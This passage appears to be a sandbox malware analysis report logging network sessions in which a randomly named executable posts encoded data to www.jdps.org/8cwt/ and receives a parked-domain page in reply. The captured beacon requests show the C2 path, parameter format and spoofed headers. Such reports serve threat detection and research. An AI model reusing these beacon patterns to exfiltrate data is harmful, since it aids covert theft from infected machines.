                                      Data Ascii: .83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814
                                      Jun 4, 2024 14:18:40.259628057 CEST1289INData Raw: 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36 31 36 2c 31 2e 32 34 36 31
                                      Data Ascii: 2.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1.305,0,0,
                                      Jun 4, 2024 14:18:40.259653091 CEST1289INData Raw: 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31 32 2e 38 32 30 33 36 2c 32
                                      Data Ascii: 1,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352,1.25352,
                                      Jun 4, 2024 14:18:40.259677887 CEST1289INData Raw: 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e 39 37 37 37 32 63 2d 31 31
                                      Data Ascii: 52.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path><path d="
                                      Jun 4, 2024 14:18:40.259704113 CEST1289INData Raw: 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38 31 35 37 2c 32 31 2e 34 35
                                      Data Ascii: 63-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14.62777-17
                                      Jun 4, 2024 14:18:40.259736061 CEST1180INData Raw: 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36 32 2c 38 31 32 2e 33 31 34
                                      Data Ascii: 19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3.0065,10.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.11.304987434.232.203.70802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:42.786621094 CEST694OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 78 64 48 75 35 66 43 2f 38 75 45 7a 48 68 2f 63 32 62 4b 5a 4a 72 57 71 30 6f 75 36 6b 34 59 52 6e 4b 77 61 6e 41 2b 6c 34 2b 69 66 44 6d 6e 6e 53 31 75 34 53 6a 37 66 4c 33 62 67 68 31 50 66 4c 4b 50 73 51 50 47 58 6d 66 37 39 41 6b 30 67 62 52 61 59 7a 67 57 36 65 6f 6c 33 71 55 30 52 2b 4b 48 4a 76 56 4b 50 58 43 48 77 6e 6f 76 4f 75 48 6d 78 43 65 53 4d 49 7a 4e 6b 76 70 73 48 49 59 38 67 44 46 30 36 54 36 74 6e 74 4b 39 48 45 4c 51 59 6c 73 35 38 4c 72 73 62 58 35 61 63 2b 61 55 43 56 52 61 39 77 75 30 32 78 58 2b 77 2b 57 6f 30 68 66 41 47 51 73 4f 47 39 42 6c 39 55 62 74 50 6f 75 70 7a 74 6b 70 76 5a 36 2b 41 53 42 32 76 4a 4b 51 3d
                                      Data Ascii: 24eluX=xdHu5fC/8uEzHh/c2bKZJrWq0ou6k4YRnKwanA+l4+ifDmnnS1u4Sj7fL3bgh1PfLKPsQPGXmf79Ak0gbRaYzgW6eol3qU0R+KHJvVKPXCHwnovOuHmxCeSMIzNkvpsHIY8gDF06T6tntK9HELQYls58LrsbX5ac+aUCVRa9wu02xX+w+Wo0hfAGQsOG9Bl9UbtPoupztkpvZ6+ASB2vJKQ=
                                      Jun 4, 2024 14:18:42.917536974 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                      Jun 4, 2024 14:18:42.917686939 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                      Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                      Jun 4, 2024 14:18:42.917711020 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 6a 64 70 73 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 54 68 69
                                      Data Ascii: <h1>jdps.org is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"
                                      Jun 4, 2024 14:18:42.917726040 CEST1289INData Raw: 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37
                                      Data Ascii: 79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,
                                      Jun 4, 2024 14:18:42.917737961 CEST1289INData Raw: 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39
                                      Data Ascii: .83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814
                                      Jun 4, 2024 14:18:42.917748928 CEST1289INData Raw: 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36 31 36 2c 31 2e 32 34 36 31
                                      Data Ascii: 2.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1.305,0,0,
                                      Jun 4, 2024 14:18:42.917762041 CEST1289INData Raw: 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31 32 2e 38 32 30 33 36 2c 32
                                      Data Ascii: 1,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352,1.25352,
                                      Jun 4, 2024 14:18:42.917773008 CEST1289INData Raw: 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e 39 37 37 37 32 63 2d 31 31
                                      Data Ascii: 52.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path><path d="
                                      Jun 4, 2024 14:18:42.917783976 CEST1289INData Raw: 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38 31 35 37 2c 32 31 2e 34 35
                                      Data Ascii: 63-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14.62777-17
                                      Jun 4, 2024 14:18:42.917795897 CEST1180INData Raw: 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36 32 2c 38 31 32 2e 33 31 34
                                      Data Ascii: 19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3.0065,10.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.11.304987534.232.203.70802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:45.443568945 CEST1611OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 78 64 48 75 35 66 43 2f 38 75 45 7a 48 68 2f 63 32 62 4b 5a 4a 72 57 71 30 6f 75 36 6b 34 59 52 6e 4b 77 61 6e 41 2b 6c 34 2b 36 66 43 55 66 6e 54 55 75 34 52 6a 37 66 55 48 62 6a 68 31 50 4f 4c 4b 48 6f 51 50 4b 74 6d 63 50 39 41 47 38 67 53 41 61 59 6d 51 57 36 63 6f 6c 36 75 55 30 2b 2b 4b 58 56 76 56 36 50 58 43 48 77 6e 72 33 4f 71 53 53 78 45 65 53 4c 4a 7a 4e 53 38 35 74 6f 49 59 31 66 44 46 68 4e 51 4b 4e 6e 74 71 4e 48 47 35 49 59 2f 73 35 45 4b 62 74 45 58 35 58 43 2b 61 49 6f 56 53 47 58 77 70 59 32 6e 79 37 37 6c 6a 49 49 33 73 63 62 54 59 53 43 7a 67 46 38 4a 4a 73 69 6c 64 35 6b 6f 6e 31 44 42 4d 75 49 4e 43 61 6c 58 64 35 42 42 61 45 63 2b 4f 47 6e 54 73 31 30 66 4e 50 30 61 46 52 6a 2f 76 63 38 48 30 63 36 6a 4c 53 66 51 68 6b 77 79 74 77 47 4c 67 61 77 70 47 48 63 41 50 36 54 39 44 67 41 55 79 43 4b 76 6c 49 54 43 6b 45 41 72 6f 75 4b 50 50 45 38 33 70 6c 49 57 76 57 52 6f 4c 4b 5a 7a 37 4e 4a 49 2f 7a 49 41 4e 62 64 4e 6c 37 69 6c 64 77 44 6e 4d 43 33 47 64 4c [TRUNCATED]
                                      Data Ascii: 24eluX=xdHu5fC/8uEzHh/c2bKZJrWq0ou6k4YRnKwanA+l4+6fCUfnTUu4Rj7fUHbjh1POLKHoQPKtmcP9AG8gSAaYmQW6col6uU0++KXVvV6PXCHwnr3OqSSxEeSLJzNS85toIY1fDFhNQKNntqNHG5IY/s5EKbtEX5XC+aIoVSGXwpY2ny77ljII3scbTYSCzgF8JJsild5kon1DBMuINCalXd5BBaEc+OGnTs10fNP0aFRj/vc8H0c6jLSfQhkwytwGLgawpGHcAP6T9DgAUyCKvlITCkEArouKPPE83plIWvWRoLKZz7NJI/zIANbdNl7ildwDnMC3GdL5hP5pb+lGCXzjEiClMO1kc8kFYx8UmZaIC7dX++ygpS43khoMQhW6gCGk/yV7bsV2L+TLVwiL//K3LfKdhGzj1P1eWszyz3UUk4Z8t8dyCy67PBYYjZYpA4TnK0U1xydhOo4YhRlVedEfpJH+v5oAUoG9G1KUz+l7fW2lVOyirVGI1qtWtX5rYvNmPCe4Nywx5MFMhQRraC0S1cNXRUTohdi18AsrKL0QLT8EmRxqcyMrU65HW6zBgKDTlzhz0lDB/anSZ7uS7yTHrAD8sSW1ThXOVD/iI0+KMQhC9BJK8YOcU7Zvv8EBkgJRgBwDY337mvXf4LW8qOmBR1V8rN+LFhnQ4LGJbcTs/F/rUINZJlaerzMma32/xIfTQjneGm2p26M1yC1R2fpwXHAWSskIzXBEjBs6OniaCFvccXv41QNT4x+jd8OoeMciaso2byGftLdutIhcbxpUSU+16XMvF3DxOerb1vhsIPC06DHktZY7qu8UbJ02MoUcG3StLz2QqbCYHHfO5VndbjKJE7M5dO3p3KIcPGeUsTZCh1iGtuFLyKqbMjhsuiM5IW0BKug20JOO3eI9X0b0H3YLEMrV6/Z30pWkEvC2icZbB6LH694lOyGcPzZYx4blpaWkblcw/gYz37neWCQ8K0rf0WAXCGmvi0Uqym5NT [TRUNCATED]
                                      Jun 4, 2024 14:18:45.577114105 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                      Jun 4, 2024 14:18:45.577306032 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                      Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                      Jun 4, 2024 14:18:45.577318907 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 6a 64 70 73 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 54 68 69
                                      Data Ascii: <h1>jdps.org is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"
                                      Jun 4, 2024 14:18:45.577331066 CEST1289INData Raw: 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37
                                      Data Ascii: 79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,
                                      Jun 4, 2024 14:18:45.577356100 CEST1289INData Raw: 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39
                                      Data Ascii: .83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814
                                      Jun 4, 2024 14:18:45.577369928 CEST1289INData Raw: 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36 31 36 2c 31 2e 32 34 36 31
                                      Data Ascii: 2.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1.305,0,0,
                                      Jun 4, 2024 14:18:45.577380896 CEST1289INData Raw: 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31 32 2e 38 32 30 33 36 2c 32
                                      Data Ascii: 1,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352,1.25352,
                                      Jun 4, 2024 14:18:45.577392101 CEST1289INData Raw: 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e 39 37 37 37 32 63 2d 31 31
                                      Data Ascii: 52.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path><path d="
                                      Jun 4, 2024 14:18:45.577403069 CEST1289INData Raw: 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38 31 35 37 2c 32 31 2e 34 35
                                      Data Ascii: 63-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14.62777-17
                                      Jun 4, 2024 14:18:45.577605963 CEST1180INData Raw: 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36 32 2c 38 31 32 2e 33 31 34
                                      Data Ascii: 19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3.0065,10.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.11.304987634.232.203.70802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:48.102632999 CEST423OUTGET /8cwt/?24eluX=8fvO6riwiNdGIieTsu/tMoq1+6O9galEvK05+Szv2OjuFl7+WHHAVTXMU1G96mraFYLMRcvsh+SJXHUnSCy+mSK3fOJTqBcOyoKopFv0eDv6jorQ0HypEvo=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:48.235074043 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
